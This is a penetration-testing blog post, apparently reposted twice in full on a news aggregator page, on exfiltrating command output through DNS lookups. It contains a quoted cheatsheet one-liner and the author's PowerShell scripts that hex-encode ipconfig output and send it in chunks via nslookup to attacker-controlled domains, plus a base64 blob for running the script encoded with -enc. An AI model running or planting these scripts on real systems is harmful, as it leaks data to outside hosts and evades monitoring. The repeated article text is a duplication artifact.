Out of Band (OOB) Data Exfiltration via DNS

Last week, I attended the NotSoSecure Advanced Web Hacking training. While there were plenty of interesting topics taught, one that caught my attention was Out-of-Band (OOB) Data Exfiltration using DNS.

Back in 2018, NotSoSecure published an Out of Band Exploitation (OOB) CheatSheet. In that document, they cover methods by which you can exfiltrate data. One of these uses files written to disk and multiple DNS queries to send large chunks of data.

cmd /v /c "ipconfig > output && certutil -encodehex -f output output.hex 4 && powershell $text=Get-Content 
output.hex;$subdomain=$text.replace(' ','');$j=11111;foreach($i in $subdomain)
 $final=$j.tostring()+'.'+$i+'.file.oob.dnsattacker.com';$j += 1; nslookup $final "    
# Sending file in HEX

The idea here is that the command is executed and written to a file, that file is the hex encoded with certutil, and the file is sent in bite-sized pieces to a listening DNS server. They also provide a tcpdump command to capture the data on the DNS server and a command to reconstruct the data into its original format.

I thought this was great, but I disliked having to write files to disk and since PowerShell was already being used, I figured I could replace the entire process with a chunk of PowerShell and remove my reliance on knowing where I had write access. The end result was the following script:

$exfil_domain = '.oob.a.c0ffee.ca'
$cmd = ipconfig
$cmd = $cmd -join "`n"
$cmd.ToCharArray() | foreach-object$char = [System.String]::Format("0:X2", [System.Convert]::ToUInt32($_))
$subdomain += $char
$id=11111
for($i = 0; $i -lt $subdomain.Length; $i += 32) 
    try 
        $final=$id.tostring()+'.'+$subdomain.SubString($i, 32) + $exfil_domain
    
    catch [ArgumentOutOfRangeException] 
        $final=$id.tostring()+'.'+$subdomain.SubString($i) + $exfil_domain
    
    $id += 1
    Start-Process -NoNewWindow nslookup $final

I found that my local DNS Server could not process the requests that my system was making, so I made a few tweaks to help the script out, I would consider both optional (and sometimes one change or the other is sufficient).

$exfil_domain = '.oob.a.c0ffee.ca'
$cmd = ipconfig
$cmd = $cmd -join "`n"
$cmd.ToCharArray() | foreach-object$char = [System.String]::Format("0:X2", [System.Convert]::ToUInt32($_))
$subdomain += $char
$id=11111
for($i = 0; $i -lt $subdomain.Length; $i += 32) 
    try 
        $final=$id.tostring()+'.'+$subdomain.SubString($i, 32) + $exfil_domain
    
    catch [ArgumentOutOfRangeException] 
        $final=$id.tostring()+'.'+$subdomain.SubString($i) + $exfil_domain
    
    $id += 1
    Start-Process -NoNewWindow nslookup "$final ns.c0ffee.ca"
    Start-Sleep -Milliseconds 100

The changes exist within the last 2 lines. First, we specify a name server directly and secondly, we add a sleep. While this makes the exfiltration take a little longer (and it is possible that a non-standard DNS server will be noticed), I did notice fewer dropped queries against my local DNS server.

Once you have your code written, you can pop it into CyberChef using two recipes – Encode Text [UTF-16LE (1200] and To Base64 [A-Za-z0-9+/=]. The result is an encoded blob that looks like this:

JABlAHgAZgBpAGwAXwBkAG8AbQBhAGkAbgAgAD0AIAAnAC4AbwBvAGIALgBhAC4AYwAwAGYAZgBlA

GUALgBjAGEAJwAKACQAYwBtAGQAIAA9ACAAaQBwAGMAbwBuAGYAaQBnAAoAJABjAG0AZAAgAD0

AIAAkAGMAbQBkACAALQBqAG8AaQBuACAAIgBgAG4AIgAKACQAYwBtAGQALgBUAG8AQwBoAGEAcg

BBAHIAcgBhAHkAKAApACAAfAAgAGYAbwByAGUAYQBjAGgALQBvAGIAagBlAGMAdAB7ACQAYwBoAG

EAcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwB0AHIAaQBuAGcAXQA6ADoARgBvAHIAbQBhAHQAK

AAiAHsAMAA6AFgAMgB9ACIALAAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6A

FQAbwBVAEkAbgB0ADMAMgAoACQAXwApACkACgAkAHMAdQBiAGQAbwBtAGEAaQBuACAAKwA9AC

AAJABjAGgAYQByAH0ACgAkAGkAZAA9ADEAMQAxADEAMQAKAGYAbwByACgAJABpACAAPQAgADA

AOwAgACQAaQAgAC0AbAB0ACAAJABzAHUAYgBkAG8AbQBhAGkAbgAuAEwAZQBuAGcAdABoADsAIA

AkAGkAIAArAD0AIAAzADIAKQAgAHsACgAgACAAIAAgAHQAcgB5ACAAewAKACAAIAAgACAAIAAgACA

AIAAkAGYAaQBuAGEAbAA9ACQAaQBkAC4AdABvAHMAdAByAGkAbgBnACgAKQArACcALgAnACsAJAB

zAHUAYgBkAG8AbQBhAGkAbgAuAFMAdQBiAFMAdAByAGkAbgBnACgAJABpACwAIAAzADIAKQAgACs

AIAAkAGUAeABmAGkAbABfAGQAbwBtAGEAaQBuAAoAIAAgACAAIAB9AAoAIAAgACAAIABjAGEAdABjA

GgAIABbAEEAcgBnAHUAbQBlAG4AdABPAHUAdABPAGYAUgBhAG4AZwBlAEUAeABjAGUAcAB0AGkAb

wBuAF0AIAB7AAoAIAAgACAAIAAgACAAIAAgACQAZgBpAG4AYQBsAD0AJABpAGQALgB0AG8AcwB0A

HIAaQBuAGcAKAApACsAJwAuACcAKwAkAHMAdQBiAGQAbwBtAGEAaQBuAC4AUwB1AGIAUwB0AHIA

aQBuAGcAKAAkAGkAKQAgACsAIAAkAGUAeABmAGkAbABfAGQAbwBtAGEAaQBuAAoAIAAgACAAIAB9

AAoAIAAgACAAIAAkAGkAZAAgACsAPQAgADEACgAgACAAIAAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZ

QBzAHMAIAAtAE4AbwBOAGUAdwBXAGkAbgBkAG8AdwAgAG4AcwBsAG8AbwBrAHUAcAAgACQAZgBp

AG4AYQBsAAoAfQA =

This can be passed into PowerShell using the -enc option and your data exfiltration is complete. Let’s take a quick look at the process using the following images.

Step 1: ipconfig output for comparison

Step 2: tcpdump listening on the nameserver

Step 2 tcpdump listening on the nameserver (Out of Band (OOB) Data Exfiltration via DNS)

Step 3: Running the encoded PowerShell

Step 3 Running the encoded PowerShell (Out of Band (OOB) Data Exfiltration via DNS)

Step 4: Exfiltrated Data

Step 4 Exfiltrated Data (Out of Band (OOB) Data Exfiltration via DNS)

Thanks again to Sanjay Gondaliya (@realsanjay) and Dhruv Shah (@Snypter) at NotSoSecure (@notsosecure) for a great class and the OOB Exploitation CheatSheet that inspired me to search for a pure PowerShell approach.

Source

Last week, I attended the NotSoSecure Advanced Web Hacking training. While there were plenty of interesting topics taught, one that caught my attention was Out-of-Band (OOB) Data Exfiltration using DNS.

Back in 2018, NotSoSecure published an Out of Band Exploitation (OOB) CheatSheet. In that document, they cover methods by which you can exfiltrate data. One of these uses files written to disk and multiple DNS queries to send large chunks of data.

cmd /v /c "ipconfig > output && certutil -encodehex -f output output.hex 4 && powershell $text=Get-Content 
output.hex;$subdomain=$text.replace(' ','');$j=11111;foreach($i in $subdomain)
 $final=$j.tostring()+'.'+$i+'.file.oob.dnsattacker.com';$j += 1; nslookup $final "    
# Sending file in HEX

The idea here is that the command is executed and written to a file, that file is the hex encoded with certutil, and the file is sent in bite-sized pieces to a listening DNS server. They also provide a tcpdump command to capture the data on the DNS server and a command to reconstruct the data into its original format.

I thought this was great, but I disliked having to write files to disk and since PowerShell was already being used, I figured I could replace the entire process with a chunk of PowerShell and remove my reliance on knowing where I had write access. The end result was the following script:

$exfil_domain = '.oob.a.c0ffee.ca'
$cmd = ipconfig
$cmd = $cmd -join "`n"
$cmd.ToCharArray() | foreach-object$char = [System.String]::Format("0:X2", [System.Convert]::ToUInt32($_))
$subdomain += $char
$id=11111
for($i = 0; $i -lt $subdomain.Length; $i += 32) 
    try 
        $final=$id.tostring()+'.'+$subdomain.SubString($i, 32) + $exfil_domain
    
    catch [ArgumentOutOfRangeException] 
        $final=$id.tostring()+'.'+$subdomain.SubString($i) + $exfil_domain
    
    $id += 1
    Start-Process -NoNewWindow nslookup $final

I found that my local DNS Server could not process the requests that my system was making, so I made a few tweaks to help the script out, I would consider both optional (and sometimes one change or the other is sufficient).

$exfil_domain = '.oob.a.c0ffee.ca'
$cmd = ipconfig
$cmd = $cmd -join "`n"
$cmd.ToCharArray() | foreach-object$char = [System.String]::Format("0:X2", [System.Convert]::ToUInt32($_))
$subdomain += $char
$id=11111
for($i = 0; $i -lt $subdomain.Length; $i += 32) 
    try 
        $final=$id.tostring()+'.'+$subdomain.SubString($i, 32) + $exfil_domain
    
    catch [ArgumentOutOfRangeException] 
        $final=$id.tostring()+'.'+$subdomain.SubString($i) + $exfil_domain
    
    $id += 1
    Start-Process -NoNewWindow nslookup "$final ns.c0ffee.ca"
    Start-Sleep -Milliseconds 100

The changes exist within the last 2 lines. First, we specify a name server directly and secondly, we add a sleep. While this makes the exfiltration take a little longer (and it is possible that a non-standard DNS server will be noticed), I did notice fewer dropped queries against my local DNS server.

Once you have your code written, you can pop it into CyberChef using two recipes – Encode Text [UTF-16LE (1200] and To Base64 [A-Za-z0-9+/=]. The result is an encoded blob that looks like this:

JABlAHgAZgBpAGwAXwBkAG8AbQBhAGkAbgAgAD0AIAAnAC4AbwBvAGIALgBhAC4AYwAwAGYAZgBlA

GUALgBjAGEAJwAKACQAYwBtAGQAIAA9ACAAaQBwAGMAbwBuAGYAaQBnAAoAJABjAG0AZAAgAD0

AIAAkAGMAbQBkACAALQBqAG8AaQBuACAAIgBgAG4AIgAKACQAYwBtAGQALgBUAG8AQwBoAGEAcg

BBAHIAcgBhAHkAKAApACAAfAAgAGYAbwByAGUAYQBjAGgALQBvAGIAagBlAGMAdAB7ACQAYwBoAG

EAcgAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUwB0AHIAaQBuAGcAXQA6ADoARgBvAHIAbQBhAHQAK

AAiAHsAMAA6AFgAMgB9ACIALAAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6A

FQAbwBVAEkAbgB0ADMAMgAoACQAXwApACkACgAkAHMAdQBiAGQAbwBtAGEAaQBuACAAKwA9AC

AAJABjAGgAYQByAH0ACgAkAGkAZAA9ADEAMQAxADEAMQAKAGYAbwByACgAJABpACAAPQAgADA

AOwAgACQAaQAgAC0AbAB0ACAAJABzAHUAYgBkAG8AbQBhAGkAbgAuAEwAZQBuAGcAdABoADsAIA

AkAGkAIAArAD0AIAAzADIAKQAgAHsACgAgACAAIAAgAHQAcgB5ACAAewAKACAAIAAgACAAIAAgACA

AIAAkAGYAaQBuAGEAbAA9ACQAaQBkAC4AdABvAHMAdAByAGkAbgBnACgAKQArACcALgAnACsAJAB

zAHUAYgBkAG8AbQBhAGkAbgAuAFMAdQBiAFMAdAByAGkAbgBnACgAJABpACwAIAAzADIAKQAgACs

AIAAkAGUAeABmAGkAbABfAGQAbwBtAGEAaQBuAAoAIAAgACAAIAB9AAoAIAAgACAAIABjAGEAdABjA

GgAIABbAEEAcgBnAHUAbQBlAG4AdABPAHUAdABPAGYAUgBhAG4AZwBlAEUAeABjAGUAcAB0AGkAb

wBuAF0AIAB7AAoAIAAgACAAIAAgACAAIAAgACQAZgBpAG4AYQBsAD0AJABpAGQALgB0AG8AcwB0A

HIAaQBuAGcAKAApACsAJwAuACcAKwAkAHMAdQBiAGQAbwBtAGEAaQBuAC4AUwB1AGIAUwB0AHIA

aQBuAGcAKAAkAGkAKQAgACsAIAAkAGUAeABmAGkAbABfAGQAbwBtAGEAaQBuAAoAIAAgACAAIAB9

AAoAIAAgACAAIAAkAGkAZAAgACsAPQAgADEACgAgACAAIAAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZ

QBzAHMAIAAtAE4AbwBOAGUAdwBXAGkAbgBkAG8AdwAgAG4AcwBsAG8AbwBrAHUAcAAgACQAZgBp

AG4AYQBsAAoAfQA =

This can be passed into PowerShell using the -enc option and your data exfiltration is complete. Let’s take a quick look at the process using the following images.

Step 1: ipconfig output for comparison

Step 2: tcpdump listening on the nameserver

Step 2 tcpdump listening on the nameserver (Out of Band (OOB) Data Exfiltration via DNS)

Step 3: Running the encoded PowerShell

Step 3 Running the encoded PowerShell (Out of Band (OOB) Data Exfiltration via DNS)

Step 4: Exfiltrated Data

Step 4 Exfiltrated Data (Out of Band (OOB) Data Exfiltration via DNS)

Thanks again to Sanjay Gondaliya (@realsanjay) and Dhruv Shah (@Snypter) at NotSoSecure (@notsosecure) for a great class and the OOB Exploitation CheatSheet that inspired me to search for a pure PowerShell approach.

Source

More from author

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Related posts

Advertismentspot_img

Latest posts

YouAttest collaborates with JumpCloud to give users access reviews for identity governance

YouAttest announced their product integration with JumpCloud - an open directory platform that gives IT, security...

SLACIP: How to Comply with the SOCI ACT Reforms

On March 31, 2022, the Security Legislation Amendment Critical Infrastructure Protection Act 2022, also known as SLACIP, was passed by the Australian Parliament. ...

Microsoft patches the Patch Tuesday patch that broke authentication – Naked Security

Two of the big-news vulnerabilities in this month's Patch Tuesday updates from Microsoft were CVE-2022-26923 and CVE-2022-26931which affected the safety of authentication in Windows. Even...

Want to stay up to date with the latest news?

We would love to hear from you! Please fill in your details and we will stay in touch. It's that simple!